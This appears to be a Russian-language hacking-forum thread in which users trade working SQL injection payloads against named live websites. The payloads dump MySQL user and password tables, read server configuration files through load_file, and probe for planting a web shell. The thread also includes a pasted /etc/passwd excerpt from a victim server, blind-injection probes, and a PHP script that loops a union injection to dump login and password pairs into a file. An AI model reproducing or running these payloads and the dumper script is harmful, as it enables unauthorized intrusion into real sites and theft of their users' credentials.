это больше на накрутку чего то тянет, по указанному выше адресу попадаем на страницу с фреймом где по идее юзеру парят примерно следующие куки Set-Cookie: SL_003_0000=_10000_; domain=telefon4je.info; path=/; expires=Sat, 20-Nov-2010 18:35:15 GMT Set-Cookie: TSUSER=003; expires=Sun, 17-Jan-2038 19:14:07 GMT; path=/; domain=telefon4je.info Set-Cookie: SL_2_0000=_0_; domain=telefon4je.info; path=/; expires=Wed, 17-Nov-2010 14:35:15 GMT и переадресовывают 302 редиректом сюда new-xmading.ru
вопрос по limit ни как не пойму, если сливать базу через скуль-инъекцию через limit то сливает от силы 20-30К, если же через where+id= то тянешь всю базу на 200-300К. почему limit выводит лишь часть?
посоветуйте программу или скрипт для слива бд. Чтоб прога сливала через where+id http://site.ru/news.php?id=1+union+select+1,2,name,4+from+users+where+id={index}-- а не через limit.
Подскажите, можно ли залить шелл? http://www.skyalbum.com/showAlbum/-223451+union+select+1,2,3,4,5,6,concat%28user%28%29,0x3a,user,0x3a,password,0x3a,File_Priv,0x3a,Load_File%28%27/etc/httpd/conf/httpd.conf%27%29%29,8,9,10,11,12,13,14,15+from+mysql.user-- Заранее благодарю...
http://www.skyalbum.com/showAlbum/-223451+union+select+1,2,3,4,5,6,file_priv,8,9,10,11,12,13,14,15+from+mysql.user+where+user='skyalbum_db_user'-- да можно залить...
Спасибо, но что файл прив есть я знаю, мне интересно другое, мне нужно найти полный путь, но чет не получается, может он указан в каком-нить конфиге?
/etc/httpd/conf/httpd.conf /usr/apache/httpd.conf и так далее и тому подобное..тебе эти файлы о чем нибудь говорят ? в /etc/passwd очень редко путь абсолютный я находил..
мне говорят, но я же сначала глянул на этот сайт, а ты просто сумничать решил, тут, видимо, как раз тот редкий случай, когда в пассвд есть путь, а в хттпд.конф нет: Code: flash.dvd-photo-slideshow.com:x:502:48:flash.dvd-photo-slideshow.com:[B]/var/www/flash.dvd-photo-slideshow.com[/B]:/sbin/nologin jp.flash-slideshow-maker.com:x:503:48::[B]/var/www/jp.flash-slideshow-maker.com[/B]:/sbin/nologin m4p-mp3.tuneclone.com:x:504:48::[B]/var/www/m4p-mp3.tuneclone.com[/B]:/sbin/nologin skyalbum.com:x:505:48::[B]/var/www/skyalbum.com[/B]:/sbin/nologin
а при чем тут шелл? вопрос был в том, чтобы найти абсолютный путь, я подсказал, он указан в /etc/passwd, а папку с правами на запись уж пусть сам дальше ищет что ж ты нервный-то такой
можно такой примитив заюзать например PHP: function ololo($url,$proxy='127.0.0.1') { $ch=curl_init($url); curl_setopt($ch,CURLOPT_RETURNTRANSFER,1); curl_setopt($ch,CURLOPT_PROXY,$proxy); $content=curl_exec($ch); curl_close($ch); return $content; } $num='1000'; // максимальный id $regex='~<title>(.*?)</title>~'; //ну ты понел $f=fopen('db','a+'); for($i=0;$i<$num;$i++) { preg_match($regex,ololo("http://microsoft.com/billi.php?id=-1+union+select+concat_ws(0x3a,login,pass),2,3+from+billies_monkeys+where+id=$i--"),$m); fwrite($f,$m[1]."\n"); } fclose($f); не тестил, но должно работать вроде как..
как слепую точно можно: true: http://www.bookmg.ru/news/post/id.15+and+1=1 http://www.bookmg.ru/news/post/id.15+and+substring(@@version,1,1)='M' http://www.bookmg.ru/news/post/id.15+and+(select+system_user)='sa' false: http://www.bookmg.ru/news/post/id.15+and+1=0
Мог бы кто не будь рассказать или дать ссылки на русское описание по использованию(или видео) JBroFuzz? Был бы весьма признателен. P.S.Видео от создателей видел(OWASP),но может есть от наших умельцев.